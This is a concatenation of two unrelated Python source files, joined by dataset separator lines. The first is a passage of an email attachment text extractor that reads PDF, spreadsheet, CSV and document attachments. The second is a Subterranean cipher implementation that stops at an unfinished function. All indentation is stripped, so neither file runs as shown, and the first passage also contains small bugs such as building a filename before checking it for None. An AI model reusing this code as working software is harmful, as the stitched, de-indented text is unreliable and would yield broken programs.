if len(line) == 2:
from_conf = line[1].strip()
if from_conf:
collected = from_conf
except:
tkinter.messagebox.showinfo(
parent=self.parent,
title="Read Configuration File",
message="".join(
(
"Unable to determine collected directory.\n\n",
"Using name from extract configuration.",
)
),
)
finally:
cc.close()
except:
pass
if collected is None:
ms = COLLECTED
else:
ms = os.path.join(eventdirectory, collected)
self.mailstore = os.path.expanduser(os.path.expandvars(ms))
if extracted is None:
self._extracts = os.path.join(eventdirectory, EXTRACTED)
else:
self._extracts = os.path.join(eventdirectory, extracted)
d = AppSysDate()
if earliestdate is not None:
if d.parse_date(earliestdate) == -1:
tkinter.messagebox.showinfo(
parent=self.parent,
title="Read Configuration File",
message="".join(
(
"Format error in earliest date argument.\n\n",
"Please fix configuration file.",
)
),
)
self.earliestdate = False
else:
self.earliestdate = d.iso_format_date()
else:
self.earliestdate = earliestdate
if mostrecentdate is not None:
if d.parse_date(mostrecentdate) == -1:
tkinter.messagebox.showinfo(
parent=self.parent,
title="Read Configuration File",
message="".join(
(
"Format error in most recent date argument.\n\n",
"Please fix configuration file.",
)
),
)
self.mostrecentdate = False
else:
self.mostrecentdate = d.iso_format_date()
else:
self.mostrecentdate = mostrecentdate
self.emailsender = emailsender
self.eventdirectory = eventdirectory
self.ignore = ignore
self._selected_emails = None
self._selected_emails_text = None
self._text_extracted_from_emails = None
if pdf_content_type:
self.pdf_content_type = pdf_content_type
else:
self.pdf_content_type = frozenset()
if text_content_type:
self.text_content_type = text_content_type
else:
self.text_content_type = frozenset()
if ss_content_type:
self.ss_content_type = ss_content_type
else:
self.ss_content_type = frozenset()
if csv_content_type:
self.csv_content_type = csv_content_type
else:
self.csv_content_type = frozenset()
if docx_content_type:
self.docx_content_type = docx_content_type
else:
self.docx_content_type = frozenset()
if odt_content_type:
self.odt_content_type = odt_content_type
else:
self.odt_content_type = frozenset()
if xlsx_content_type:
self.xlsx_content_type = xlsx_content_type
else:
self.xlsx_content_type = frozenset()
if ods_content_type:
self.ods_content_type = ods_content_type
else:
self.ods_content_type = frozenset()
if include_csv_file is None:
self.include_csv_file = []
else:
self.include_csv_file = include_csv_file
if exclude_csv_file is None:
self.exclude_csv_file = []
else:
self.exclude_csv_file = exclude_csv_file
if include_ss_file_sheet is None:
self.include_ss_file_sheet = []
else:
self.include_ss_file_sheet = include_ss_file_sheet
if exclude_ss_file_sheet is None:
self.exclude_ss_file_sheet = []
else:
self.exclude_ss_file_sheet = exclude_ss_file_sheet
def get_emails(self):
"""Return email files in order stored in mail store.
Each email is stored in a file named:
<self.mailstore>/yyyymmddHHMMSS<sender><utc offset>.mbs
"""
emails = []
if self.earliestdate is not None:
try:
date(*tuple([int(d) for d in self.earliestdate.split("-")]))
except:
tkinter.messagebox.showinfo(
parent=self.parent,
title="Get Emails",
message="".join(
(
"Earliest date format error.\n\n",
"Please fix configuration file.",
)
),
)
return emails
if self.mostrecentdate is not None:
try:
date(*tuple([int(d) for d in self.mostrecentdate.split("-")]))
except:
tkinter.messagebox.showinfo(
parent=self.parent,
title="Get Emails",
message="".join(
(
"Most recent date format error.\n\n",
"Please fix configuration file.",
)
),
)
return emails
try:
ms = self.mailstore
ems = self.emailsender
for a in os.listdir(ms):
if self.ignore:
if a in self.ignore:
continue
if ems:
for e in ems:
if e == a[8 : 8 + len(e)]:
break
else:
continue
emd = "-".join((a[:4], a[4:6], a[6:8]))
if self.earliestdate is not None:
if emd < self.earliestdate:
continue
if self.mostrecentdate is not None:
if emd > self.mostrecentdate:
continue
emails.append(self._extracttext(a, self))
except FileNotFoundError:
emails.clear()
tkinter.messagebox.showinfo(
parent=self.parent,
title="Get Emails",
message="".join(
(
"Attempt to get files in directory\n\n",
str(self.mailstore),
"\n\nfailed.",
)
),
)
emails.sort()
return emails
def _get_emails_for_from_addressees(self):
"""Return selected email files in order stored in mail store.
        Emails are selected by 'From Addressee' using the email addresses in
        the emailsender argument of the ExtractEmail() call.
"""
return [
e
for e in self.get_emails()
if e.is_from_addressee_in_selection(self.emailsender)
]
@property
def selected_emails(self):
""" """
if self._selected_emails is None:
self._selected_emails = self._get_emails_for_from_addressees()
return self._selected_emails
@property
def excluded_emails(self):
""" """
if not self.ignore:
return set()
return set(self.ignore)
class ExtractText(object):
"""Repreresent the stages in processing an email."""
def __init__(self, filename, emailstore):
""" """
self.filename = filename
self._emailstore = emailstore
self._message = None
self._encoded_text = None
self._extracted_text = None
self._edit_differences = None
self._difference_file_exists = None
self._date = None
self._delivery_date = None
def __eq__(self, other):
"""Return True if self.filename == other.filename."""
return self.filename == other.filename
def __lt__(self, other):
"""Return True if self.filename < other.filename."""
return self.filename < other.filename
@property
def email_path(self):
""" """
return os.path.join(self._emailstore.mailstore, self.filename)
@property
def difference_file_path(self):
""" """
return os.path.join(
self._emailstore._extracts, os.path.splitext(self.filename)[0]
)
@property
def difference_file_exists(self):
"""Return True if difference file existed when edit_differences set.
True means the email does not change the original text.
False means the edited version of text is copied from the email text.
None means answer is unknown because edit_differences has not been set.
"""
return self._difference_file_exists
def is_from_addressee_in_selection(self, selection):
""" """
if selection is None:
return True
from_ = parseaddr(self.message.get("From"))[-1]
if not selection:
return self.message.generate_filename()
# Ignore emails not sent by someone in self.emailsender.
# Account owners may be in that set, so emails sent from one
# account owner to another can get selected.
if from_ in selection:
return self.message.generate_filename()
else:
return False
@property
def message(self):
""" """
if self._message is None:
mf = open(self.email_path, "rb")
try:
self._message = message_from_binary_file(
mf, _class=MessageFile
)
self._date = [
parsedate_tz(d)[:-1]
for d in self.message.get_all("date", [])
]
self._delivery_date = [
parsedate_tz(d)[:-1]
for d in self.message.get_all("delivery-date", [])
]
finally:
mf.close()
return self._message
@property
def encoded_text(self):
""" """
if self._encoded_text is None:
ems = self._emailstore
text = []
for p in self.message.walk():
cte = p.get("Content-Transfer-Encoding")
if cte:
if cte.lower() == "base64":
t = p.get_payload(decode=True)
if t:
text.append(t)
# If no text at all is extracted return a single blank line.
if not text:
text.append(b"\n")
# Ensure the extracted text ends with a newline so that editing of
# the last line causes difflib processing to append the '? ---\n'
# or '? +++\n' as a separate line in the difference file.
# This may make the one character adjustment done by
# _insert_entry() in the SourceEdit class redundant.
# The reason to not do this all along was to avoid making any
# change at all between the selected email payload and the original
# version held in the difference file, including an extra newline.
# Attempts to wrap difflib functions to cope seem not worth it, if
# such prove possible at all.
if not text[-1].endswith(b"\n"):
text[-1] = b"".join((text[-1], b"\n"))
self._encoded_text = text
return self._encoded_text
def _extract_text(
self, content_type, filename, payload, text, charset=None
):
ems = self._emailstore
if content_type == _PDF:
if _PDFTOTEXT:
self._get_pdf_text_using_xpdf(filename, payload, text)
elif pdfminer:
self.get_pdf_text_using_pdfminer3k(None, payload, text)
elif content_type == _SS:
if _SSTOCSV:
self._get_ss_text_using_gnumeric(filename, payload, text)
elif content_type == _XLSX:
if _SSTOCSV:
self._get_ss_text_using_gnumeric(filename, payload, text)
elif xlsx2csv:
self._get_ss_text_using_xlsx2csv(filename, payload, text)
elif content_type == _ODS:
if _SSTOCSV:
self._get_ss_text_using_gnumeric(filename, payload, text)
else:
self._get_ods_text_using_python_xml(filename, payload, text)
elif content_type == _CSV:
if ems.include_csv_file:
if filename not in ems.include_csv_file:
return
elif ems.exclude_csv_file:
if filename in ems.exclude_csv_file:
return
text.append(self.get_csv_text(payload, charset))
elif content_type == _TXT:
text.append(payload.decode(charset))
elif content_type == _DOCX:
text.append(self.get_docx_text(payload, ems.eventdirectory))
elif content_type == _ODT:
text.append(self.get_odt_text(payload, ems.eventdirectory))
@property
def extracted_text(self):
""" """
if self._extracted_text is None:
ems = self._emailstore
text = []
for p in self.message.walk():
ct = p.get_content_type()
if ct in ems.pdf_content_type:
self._extract_text(
_PDF,
p.get_filename(),
p.get_payload(decode=True),
text,
)
elif ct in ems.ss_content_type:
self._extract_text(
_SS, p.get_filename(), p.get_payload(decode=True), text
)
elif ct in ems.xlsx_content_type:
self._extract_text(
_XLSX,
p.get_filename(),
p.get_payload(decode=True),
text,
)
elif ct in ems.ods_content_type:
self._extract_text(
_ODS,
p.get_filename(),
p.get_payload(decode=True),
text,
)
elif ct in ems.csv_content_type:
self._extract_text(
_CSV,
p.get_filename(),
p.get_payload(decode=True),
text,
charset=p.get_param("charset", failobj="utf-8"),
)
elif ct in ems.text_content_type:
self._extract_text(
_TXT,
p.get_filename(),
p.get_payload(decode=True),
text,
charset=p.get_param("charset", failobj="iso-8859-1"),
)
elif ct in ems.docx_content_type:
self._extract_text(
_DOCX,
p.get_filename(),
p.get_payload(decode=True),
text,
)
elif ct in ems.odt_content_type:
self._extract_text(
_ODT,
p.get_filename(),
p.get_payload(decode=True),
text,
)
elif ct == "application/ms-tnef":
if not tnefparse:
text.append(
"".join(
(
"Cannot process attachment: ",
"tnefparse is not installed.",
)
)
)
continue
# I do not know if the wrapped attachment type names are
# encoded within the application/ms-tnef attachment, or the
# mapping if so. Fall back on assumption from file name
# extension.
# Similar point applies for charset argument used when
# extracting csv or txt attachments.
# As far as I know, the only application/ms-tnef
# attachments ever received by me at time of writing
# contain just *.txt attachments. These are not processed
# by this route.
tnef = tnefparse.TNEF(base64.b64decode(p.get_payload()))
for attachment in tnef.attachments:
name = attachment.name
for e in _PDF, _XLSX, _ODS, _CSV, _TXT, _DOCX, _ODT:
if name.lower().endswith(e):
self._extract_text(
e,
attachment.name,
attachment.data,
text,
charset="iso-8859-1",
)
break
else:
text.append(
"".join(
(
"Cannot process '",
name,
"' extracted from application/",
"ms-tnef attachment.",
)
)
)
# If no text at all is extracted return a single blank line.
if not text:
text.append("\n")
# Ensure the extracted text ends with a newline so that editing of
# the last line causes difflib processing to append the '? ---\n'
# or '? +++\n' as a separate line in the difference file.
# This may make the one character adjustment done by
# _insert_entry() in the SourceEdit class redundant.
# The reason to not do this all along was to avoid making any
# change at all between the selected email payload and the original
# version held in the difference file, including an extra newline.
# Attempts to wrap difflib functions to cope seem not worth it, if
# such prove possible at all.
if not text[-1].endswith("\n"):
text[-1] = "".join((text[-1], "\n"))
self._extracted_text = text
return self._extracted_text
def _is_attachment_to_be_extracted(self, attachment_filename):
ems = self._emailstore
if ems.include_ss_file_sheet:
if attachment_filename not in ems.include_ss_file_sheet:
return
elif ems.exclude_ss_file_sheet:
if attachment_filename in ems.exclude_ss_file_sheet:
return
if _decode_header(attachment_filename) is None:
tkinter.messagebox.showinfo(
parent=self._emailstore.parent,
title="Extract Spreadsheet Data",
message="Spreadsheet attachment does not have a filename.",
)
return
return True
def _create_temporary_attachment_file(self, filename, payload, dirbase):
a = _decode_header(filename)
try:
os.mkdir(os.path.join(dirbase, "xls-attachments"))
except:
pass
op = open(os.path.join(dirbase, "xls-attachments", a), "wb")
try:
op.write(payload)
finally:
op.close()
return a
def _get_ss_text_using_gnumeric(self, filename, payload, text):
fn = filename
if not self._is_attachment_to_be_extracted(fn):
return
ems = self._emailstore
taf = self._create_temporary_attachment_file(
filename, payload, ems.eventdirectory
)
process = subprocess.Popen(
(_SSTOCSV, "--recalc", "-S", taf, "%s.csv"),
cwd=os.path.join(ems.eventdirectory, "xls-attachments"),
)
process.wait()
if process.returncode == 0:
sstext = []
for sheet, sheettext in self.get_spreadsheet_text(
ems.eventdirectory
):
if fn in ems.include_ss_file_sheet:
if ems.include_ss_file_sheet[fn]:
if sheet not in ems.include_ss_file_sheet[fn]:
continue
elif fn in ems.exclude_ss_file_sheet:
if ems.exclude_ss_file_sheet[fn]:
if sheet in ems.exclude_ss_file_sheet[fn]:
continue
else:
continue
sstext.append(sheettext)
text.append("\n\n".join(sstext))
shutil.rmtree(
os.path.join(ems.eventdirectory, "xls-attachments"),
ignore_errors=True,
)
def _get_ss_text_using_xlsx2csv(self, filename, payload, text):
fn = filename
if not self._is_attachment_to_be_extracted(fn):
return
ems = self._emailstore
taf = os.path.join(
ems.eventdirectory,
"xls-attachments",
self._create_temporary_attachment_file(
filename, payload, ems.eventdirectory
),
)
# Extract all sheets and filter afterwards.
# xlsx2csv can do the filtering and will be used to do so later.
# outputencoding has to be given, even though it is default value, to
# avoid a KeyError exception on options passed to Xlsx2csv in Python 3.
# The defaults of other arguments are used as expected.
xlsx2csv.Xlsx2csv(
taf,
skip_empty_lines=True,
sheetid=0,
dateformat="%Y-%m-%d",
outputencoding="utf-8",
).convert(
os.path.join(ems.eventdirectory, "xls-attachments"), sheetid=0
)
sstext = []
for sheet, sheettext in self.get_spreadsheet_text(ems.eventdirectory):
if fn in ems.include_ss_file_sheet:
if ems.include_ss_file_sheet[fn]:
if sheet not in ems.include_ss_file_sheet[fn]:
continue
elif fn in ems.exclude_ss_file_sheet:
if ems.exclude_ss_file_sheet[fn]:
if sheet in ems.exclude_ss_file_sheet[fn]:
continue
else:
continue
sstext.append(sheettext)
text.append("\n\n".join(sstext))
shutil.rmtree(
os.path.join(ems.eventdirectory, "xls-attachments"),
ignore_errors=True,
)
def _get_ods_text_using_python_xml(self, filename, payload, text):
nstable = "{urn:oasis:names:tc:opendocument:xmlns:table:1.0}"
nstext = "{urn:oasis:names:tc:opendocument:xmlns:text:1.0}"
nsoffice = "{urn:oasis:names:tc:opendocument:xmlns:office:1.0}"
def get_rows(table):
rows = []
for row in table.iter(nstable + "table-row"):
rows.append({})
cells = rows[-1]
for cell in row.iter(nstable + "table-cell"):
repeat = int(
cell.attrib.get(
nstable + "number-columns-repeated", "1"
)
)
if cell.attrib.get(nsoffice + "value-type") == "date":
paragraphs = [cell.attrib[nsoffice + "date-value"]]
else:
paragraphs = []
for element in cell.iter(nstext + "p"):
if element.text is not None:
paragraphs.append(element.text)
text = "\n\n".join(paragraphs)
for r in range(repeat):
cells[len(cells)] = text if paragraphs else None
# Discard leading and trailing empty columns, and empty rows.
# No need to convert remaining Nones to ''s because csv module
# DictWriter.writerows() method does it.
trailing = -1
leading = max(len(r) for r in rows)
for r in rows:
notnone = sorted(k for k, v in r.items() if v is not None)
if notnone:
trailing = max(notnone[-1], trailing)
leading = min(notnone[0], leading)
for r in rows:
columns = list(r.keys())
for c in columns:
if c > trailing or c < leading:
del r[c]
return [
r
for r in rows
if len([v for v in r.values() if v is not None])
]
ems = self._emailstore
fn = filename
if ems.include_ss_file_sheet:
if fn not in ems.include_ss_file_sheet:
return
elif ems.exclude_ss_file_sheet:
if fn in ems.exclude_ss_file_sheet:
return
xmlzip = zipfile.ZipFile(io.BytesIO(payload))
archive = {}
for n in xmlzip.namelist():
with xmlzip.open(n) as f:
archive[n] = f.read()
for k, v in archive.items():
if os.path.basename(k) == "content.xml":
tree = xml.etree.ElementTree.XML(v)
sstext = []
for spreadsheet in tree.iter(nsoffice + "spreadsheet"):
for table in spreadsheet.iter(nstable + "table"):
sheet = table.attrib[nstable + "name"]
if fn in ems.include_ss_file_sheet:
if ems.include_ss_file_sheet[fn]:
if sheet not in ems.include_ss_file_sheet[fn]:
continue
elif fn in ems.exclude_ss_file_sheet:
if ems.exclude_ss_file_sheet[fn]:
if sheet in ems.exclude_ss_file_sheet[fn]:
continue
else:
continue
rows = get_rows(table)
if not rows:
continue
fieldnames = [c for c in sorted(rows[0].keys())]
csvfile = io.StringIO()
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerows(rows)
try:
sstext.append(
self.extract_text_from_csv(
csvfile, sheet=sheet
)
)
except KeyError:
raise EmailExtractorError
text.append("\n\n".join(sstext))
def get_docx_text(self, payload, dirbase):
"""Return text extracted from part, an Office Open XML email attachment.
This is Microsoft's *.docx format, not to be confused with *.odt format
which is Open Office XML (or Open Document Format).
"""
# Thanks to
# http://etienned.github.io/posts/extract-text-from-word-docs-simply/
# for which pieces to take from *.docx file.
nsb = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"
xmlzip = zipfile.ZipFile(io.BytesIO(payload))
archive = {}
for n in xmlzip.namelist():
with xmlzip.open(n) as f:
archive[n] = f.read()
text = []
for k, v in archive.items():
if os.path.basename((os.path.splitext(k)[0])) == "document":
paragraphs = []
tree = xml.etree.ElementTree.XML(v)
for p in tree.iter(nsb + "p"):
t = [n.text for n in p.iter(nsb + "t") if n.text]
if t:
paragraphs.append("".join(t))
text.append("\n\n".join(paragraphs))
return "\n".join(text)
def get_odt_text(self, payload, dirbase):
"""Return text extracted from part, an Open Office XML email attachment.
This is *.odt format (or Open Document Format), not to be confused
with Microsoft's *.docx format (or Office Open XML).
"""
nsb = "{urn:oasis:names:tc:opendocument:xmlns:text:1.0}"
topelems = {nsb + "p", nsb + "h"}
def get_text(element):
# Thanks to https://github.com/deanmalmgren/textract
# for which pieces to take from *.odt file.
text = []
if element.text is not None:
text.append(element.text)
for child in element:
if child.tag == nsb + "tab":
text.append("\t")
if child.tail is not None:
text.append(child.tail)
elif child.tag == nsb + "s":
text.append(" ")
if child.get(nsb + "c") is not None:
text.append(" " * (int(child.get(nsb + "c")) - 1))
if child.tail is not None:
text.append(child.tail)
else:
text.append(get_text(child))
if element.tail is not None:
text.append(element.tail)
return "".join(text)
xmlzip = zipfile.ZipFile(io.BytesIO(payload))
archive = {}
for n in xmlzip.namelist():
with xmlzip.open(n) as f:
archive[n] = f.read()
text = []
for k, v in archive.items():
if os.path.basename((os.path.splitext(k)[0])) == "content":
for child in xml.etree.ElementTree.fromstring(v).iter():
if child.tag in topelems:
text.append(get_text(child))
return "\n".join(text)
def _get_pdf_text_using_xpdf(self, filename, payload, text):
"""Use pdf2text utility (part of xpdf) to extract text."""
a = _decode_header(filename)
aout = a + ".txt"
if a is None:
tkinter.messagebox.showinfo(
parent=self._emailstore.parent,
title="Extract PDF Data",
message="PDF attachment does not have a filename.",
)
return ""
dirbase = self._emailstore.eventdirectory
try:
os.mkdir(os.path.join(dirbase, "pdf-attachments"))
except:
pass
op = open(os.path.join(dirbase, "pdf-attachments", a), "wb")
try:
op.write(payload)
finally:
op.close()
process = subprocess.Popen(
(
_PDFTOTEXT,
"-nopgbrk", # no way of saying this in pdfminer3k.
"-layout",
a,
aout,
),
cwd=os.path.join(dirbase, "pdf-attachments"),
)
process.wait()
if process.returncode == 0:
if os.path.exists(os.path.join(dirbase, "pdf-attachments", aout)):
op = open(
os.path.join(dirbase, "pdf-attachments", aout),
"r",
encoding="iso-8859-1",
)
try:
text.append(op.read())
finally:
op.close()
shutil.rmtree(
os.path.join(dirbase, "pdf-attachments"), ignore_errors=True
)
def get_pdf_text_using_pdfminer3k(
self, filename, payload, text, char_margin=150, word_margin=1, **k
):
"""Use pdfminer3k functions to extract text from pdf by line (row).
The char_margin and word_margin defaults give a reasonable fit to
pdftotext (part of xpdf) behaviour with the '-layout' option.
char_margin seems to have no upper limit as far as fitting with the
'-layout' option is concerned, but a word_margin value of 1.5 caused
words to be concatenated from the PDF document tried. However the
word_margin default (0.1) caused 'W's at the start of a word to be
treated as a separate word: 'Winchester' becomes 'W inchester'. There
must be something else going on because 'Winchester' remained as
'Winchester' in another, less tabular, PDF document.
The PDF document has a tabular layout (read each row) which seems to
get treated as a column layout (read each column) with the LAParams
defaults set out below.
**k captures other arguments which override defaults for pdfminer3k's
LAParams class.
At pdfminer3k-1.3.1 the arguments and their defaults are:
line_overlap=0.5
char_margin=2.0
line_margin=0.5
word_margin=0.1
boxes_flow=0.5
detect_vertical=False
all_texts=False
paragraph_indent=None
heuristic_word_margin=False
"""
# Adapted from pdf2txt.py script included in pdfminer3k-1.3.1.
# On some *.pdf inputs the script raises UnicodeEncodeError:
# 'ascii' codec can't encode character ...
# which does not happen with the adaption below.
# A sample ... is '\u2019 in position 0: ordinal not in range(128)'.
# Changing 'outfp = io.open(...)' to 'outfp = open(...)' was sufficient
# but here it is most convenient to say 'outfp = io.StringIO()'.
caching = True
rsrcmgr = pdfinterp.PDFResourceManager(caching=caching)
laparams = layout.LAParams(
char_margin=char_margin, word_margin=word_margin
)
for a in laparams.__dict__:
if a in k:
laparams.__dict__[a] = k[a]
outfp = io.StringIO()
device = converter.TextConverter(rsrcmgr, outfp, laparams=laparams)
try:
fp = io.BytesIO(payload)
try:
pdfinterp.process_pdf(
rsrcmgr,
device,
fp,
pagenos=set(),
maxpages=0,
password="",
caching=caching,
check_extractable=True,
)
finally:
fp.close()
finally:
device.close()
text.append(outfp.getvalue())
outfp.close()
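    # Illustrative usage sketch for the method above (hedged): any LAParams field
    # can be overridden by keyword via **k, e.g. to experiment with the word_margin
    # behaviour discussed in the docstring. The instance name 'extractor' and the
    # filename/payload variables are assumptions for illustration only.
    #
    #   text = []
    #   extractor.get_pdf_text_using_pdfminer3k(filename, payload, text,
    #                                           char_margin=150, word_margin=1,
    #                                           boxes_flow=0.5)
    #   print(text[0])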
def get_spreadsheet_text(self, dirbase):
"""Return (sheetname, text) from spreadsheet attachment part.
dirbase is the event directory where a temporary directory is created
to hold temporary files for the attachment extracts.
"""
text = []
for fn in os.listdir(os.path.join(dirbase, "xls-attachments")):
sheetname, e = os.path.splitext(fn)
if e.lower() != ".csv":
continue
sheetname = sheetname.lower()
csvp = os.path.join(dirbase, "xls-attachments", fn)
if not os.path.exists(csvp):
continue
try:
text.append(
(
sheetname,
self.extract_text_from_csv(
self._read_file(csvp), sheet=sheetname
),
)
)
except KeyError:
raise EmailExtractorError
except csv.Error as exc:
tkinter.messagebox.showinfo(
parent=self._emailstore.parent,
title="Extract Text from CSV",
message="".join(
(
str(exc),
"\n\nreported by csv module for sheet\n\n",
os.path.splitext(fn)[0],
"\n\nwhich is not included in extracted text.",
)
),
)
return text
def extract_text_from_csv(self, text, sheet=None, filename=None):
"""Return text if it looks like CSV format, otherwise ''.
A csv.Sniffer determines the csv dialect and text is accepted as csv
        format if the delimiter appears to be one of ',', tab, ';' or ':'.
"""
text = text.getvalue()
dialect = csv.Sniffer().sniff(text)
        if dialect.delimiter not in ",\t;:":
return ""
# All the translation in code taken from results.core.emailextractor
# at results-2.2 is removed because it is specific to application.
# Maybe this method should return the list of rows in case caller will
# do more filtering? (and the other extract_* methods)
return text
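    # Hedged illustration of the sniffing step used above (the sample text is made
    # up for demonstration and is not taken from any real attachment):
    #
    #   sample = "name;rating\nalice;2100\nbob;1985\n"
    #   dialect = csv.Sniffer().sniff(sample)
    #   dialect.delimiter   # ';' -> accepted, since it is one of ',', tab, ';', ':'
    #   list(csv.reader(io.StringIO(sample), dialect=dialect))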
def get_csv_text(self, payload, charset):
"""Return text from part, a csv attachment to an email."""
try:
return self.extract_text_from_csv(
io.StringIO(self._decode_payload(payload, charset))
)
except KeyError:
raise EmailExtractorError
def _decode_payload(self, payload, charset):
"""Return decoded payload; try 'utf-8' then 'iso-8859-1'.
iso-8859-1 should not fail but if it does fall back to ascii with
replacement of bytes that do not decode.
The current locale is not used because the decode must be the same
every time it is done.
"""
for c in charset, "iso-8859-1":
try:
return self._accept_csv_file_with_nul_characters(
payload.decode(encoding=c)
)
except UnicodeDecodeError:
pass
else:
return self._accept_csv_file_with_nul_characters(
payload.decode(encoding="ascii", errors="replace")
)
def _accept_csv_file_with_nul_characters(self, csvstring):
"""Dialogue asking what to do with csv file with NULs"""
nulcount = csvstring.count(_NUL)
if nulcount:
if (
tkinter.messagebox.askquestion(
parent=self._emailstore.parent,
title="Update Extracted Text",
message="".join(
(
"A csv file attachment to an email contains NUL ",
"characters.\n\nDo you wish to include the ",
"significant characters from this file?\n\n",
str(len(csvstring)),
" characters in file.\n",
str(nulcount),
" NULs in file.\n",
str(len(csvstring) - nulcount),
" significant characters in file.",
)
),
)
!= tkinter.messagebox.YES
):
return ""
csvstring = csvstring.replace(_NUL, "")
return csvstring
def _read_file(self, csvpath):
"""Return StringIO object containing decoded payload.
Try 'utf-8' then 'iso-8859-1' and finally 'ascii' with errors replaced.
"""
for c in "utf-8", "iso-8859-1":
csvfile = open(csvpath, encoding=c)
try:
return io.StringIO(csvfile.read())
except UnicodeDecodeError:
pass
finally:
csvfile.close()
else:
csvfile = open(csvpath, encoding="ascii", errors="replace")
try:
return io.StringIO(csvfile.read())
except UnicodeDecodeError:
pass
finally:
csvfile.close()
@property
def edit_differences(self):
"""Return list(difflin.ndiff()) of original and edited email text."""
if self._edit_differences is None:
try:
text = self._read_file(self.difference_file_path).readlines()
self._difference_file_exists = True
except FileNotFoundError:
lines = "\n".join(self.extracted_text).splitlines(1)
text = list(difflib.ndiff(lines, lines))
self._difference_file_exists = False
self._edit_differences = text
return self._edit_differences
def write_additional_file(self):
"""Write difference file, utf-8 encoding, if file does not exist."""
if self._difference_file_exists is False:
f = open(
self.difference_file_path,
mode="w",
encoding="utf8",
)
try:
f.writelines(self.edit_differences)
self._difference_file_exists = True
finally:
f.close()
@property
def dates(self):
"""Return tuple(date, delivery_dates)."""
return self._date, self._delivery_date
def _decode_header(value):
"""Decode a parameter according to RFC2231 and return the decoded string."""
b, c = email.header.decode_header(value)[0]
return b if c is None else b.decode(c)
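# Hedged examples of the email.header.decode_header behaviour relied on above
# (the filenames are illustrative only):
#
#   _decode_header("report.pdf")                      # -> "report.pdf" (charset is None)
#   _decode_header("=?utf-8?q?r=C3=A9sultats.pdf?=")  # -> "résultats.pdf"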
|
StarcoderdataPython
|
1875525
|
<reponame>siweisun/hw-subterranean
#!/usr/bin/python2
# -*- coding: utf-8 -*-
import binascii
SUBTERRANEAN_SIZE = 257
def bits_to_hex_string(in_bits, big_endian=True):
string_state = ""
if(len(in_bits)%8 == 0):
final_position = len(in_bits) - 8
else:
final_position = len(in_bits) - (len(in_bits)%8)
for i in range(0, final_position, 8):
temp_value = in_bits[i] + 2*in_bits[i+1] + 4*in_bits[i+2] + 8*in_bits[i+3] + 16*in_bits[i+4] + 32*in_bits[i+5] + 64*in_bits[i+6] + 128*in_bits[i+7]
if(big_endian):
string_state = string_state + "{0:02x}".format(temp_value)
else:
string_state = "{0:02x}".format(temp_value) + string_state
mult_factor = 1
temp_value = 0
for i in range(final_position, len(in_bits)):
temp_value += mult_factor*in_bits[i]
mult_factor *= 2
if(big_endian):
string_state = string_state + "{0:02x}".format(temp_value)
else:
string_state = "{0:02x}".format(temp_value) + string_state
return string_state
def bytearray_to_bits(value):
value_bits = [((int(value[i//8]) & (1 << (i%8))) >> (i%8)) for i in range(len(value)*8)]
return value_bits
def bits_to_bytearray(value):
value_bytearray = bytearray((len(value)+7)//8)
if(len(value) != 0):
if(len(value)%8 == 0):
final_position = len(value) - 8
else:
final_position = len(value) - (len(value)%8)
j = 0
for i in range(0, final_position, 8):
value_bytearray[j] = value[i] + 2*value[i+1] + 4*value[i+2] + 8*value[i+3] + 16*value[i+4] + 32*value[i+5] + 64*value[i+6] + 128*value[i+7]
j += 1
mult_factor = 1
value_bytearray[j] = 0
for i in range(final_position, len(value)):
value_bytearray[j] += mult_factor*value[i]
mult_factor *= 2
return value_bytearray
def subterranean_round(state_bits):
# Chi step
new_state_bits = [state_bits[i] ^ ((1 ^ state_bits[(i+1) % SUBTERRANEAN_SIZE]) & state_bits[(i+2) % SUBTERRANEAN_SIZE]) for i in range(SUBTERRANEAN_SIZE)]
# Iota step
new_state_bits[0] ^= 1
# Theta step
new_state_bits = [new_state_bits[i] ^ new_state_bits[(i+3) % SUBTERRANEAN_SIZE] ^ new_state_bits[(i+8) % SUBTERRANEAN_SIZE] for i in range(SUBTERRANEAN_SIZE)]
# Pi step
new_state_bits = [new_state_bits[(12*i) % SUBTERRANEAN_SIZE] for i in range(SUBTERRANEAN_SIZE)]
return new_state_bits
def subterranean_init():
state = [0 for i in range(SUBTERRANEAN_SIZE)]
return state
def subterranean_duplex(state, sigma):
# s <= R(s)
new_state = subterranean_round(state)
# sbar <= sbar + sigma
    index_j = 1
for i in range(len(sigma)):
new_state[index_j] ^= sigma[i]
index_j = (176*index_j) % SUBTERRANEAN_SIZE
# sbar <= sbar + (1||0*)
new_state[index_j] ^= 1
return new_state
def subterranean_extract(state):
value_out = [0 for i in range(32)]
# value_out <= extract
    index_j = 1
for i in range(32):
value_out[i] = state[index_j] ^ state[SUBTERRANEAN_SIZE-index_j]
index_j = (176*index_j) % SUBTERRANEAN_SIZE
return value_out
def subterranean_absorb_unkeyed(state, value_in):
new_state = [state[i] for i in range(len(state))]
i = 0
while(i < len(value_in) - 7):
new_state = subterranean_duplex(new_state, value_in[i:i+8])
new_state = subterranean_duplex(new_state, [])
i += 8
new_state = subterranean_duplex(new_state, value_in[i:])
new_state = subterranean_duplex(new_state, [])
return new_state
def subterranean_absorb_keyed(state, value_in):
new_state = [state[i] for i in range(len(state))]
i = 0
while(i < len(value_in) - 31):
new_state = subterranean_duplex(new_state, value_in[i:i+32])
i += 32
new_state = subterranean_duplex(new_state, value_in[i:])
return new_state
def subterranean_absorb_encrypt(state, value_in):
new_state = [state[i] for i in range(len(state))]
# Y <= *
value_out = []
i = 0
while(i < len(value_in) - 31):
temp_value_state = subterranean_extract(new_state)
temp_value_out = [value_in[i+j] ^ temp_value_state[j] for j in range(32)]
new_state = subterranean_duplex(new_state, value_in[i:i+32])
value_out = value_out + temp_value_out
i += 32
temp_value_state = subterranean_extract(new_state)
temp_value_out = [value_in[i+j] ^ temp_value_state[j] for j in range(len(value_in)-i)]
new_state = subterranean_duplex(new_state, value_in[i:])
value_out = value_out + temp_value_out
return new_state, value_out
def subterranean_absorb_decrypt(state, value_in):
new_state = [state[i] for i in range(len(state))]
# Y <= *
value_out = []
i = 0
while(i < len(value_in) - 31):
temp_value_state = subterranean_extract(new_state)
temp_value_out = [value_in[i+j] ^ temp_value_state[j] for j in range(32)]
new_state = subterranean_duplex(new_state, temp_value_out)
value_out = value_out + temp_value_out
i += 32
temp_value_state = subterranean_extract(new_state)
temp_value_out = [value_in[i+j] ^ temp_value_state[j] for j in range(len(value_in)-i)]
new_state = subterranean_duplex(new_state, temp_value_out)
value_out = value_out + temp_value_out
return new_state, value_out
def subterranean_blank(state, r_calls):
